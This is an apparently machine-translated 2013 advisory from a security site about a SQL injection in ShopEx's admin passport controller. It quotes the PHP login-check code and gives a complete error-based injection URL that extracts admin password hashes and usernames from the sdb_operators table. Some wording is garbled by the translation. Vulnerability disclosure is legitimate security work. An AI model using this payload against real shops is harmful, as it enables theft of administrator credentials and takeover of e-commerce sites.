shopex latest background page injection-vulnerability warning-the black bar safety net

2013-08-06T00:00:00
ID MYHACK58:62201340098
Type myhack58
Reporter 0day5
Modified 2013-08-06T00:00:00

Description

In\shopex\core\admin\controller\ctl. passport. php tracking backend login authentication process

function certi_validate(){

$cert = $this->system->loadModel('service/certificate');

$sess_id = $_POST['session_id'];

$return = array();

if($sess_id == $cert->get_sess()){

$return = array(

'res' => 'succ',

'msg' => ",

'info' => "

);

echo json_encode($return);

}else{

$return = array(

'res' => 'fail',

'msg' => '0 0 0 0 0 1',

'info' => 'You have the different session!'

);

echo json_encode($return);

}

}

In the parameter sess_id pass the time without doing any processing, directly into the query.

To the exp: the

http://www.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username

+limit+0,1)+)+from+information_schema. tables+limit+0,1),floor(rand(0)*2))x+from+information_schema. tables+group+by+x)a)+and+'1'='1

Representation is not a pass to kill. The low version is valid.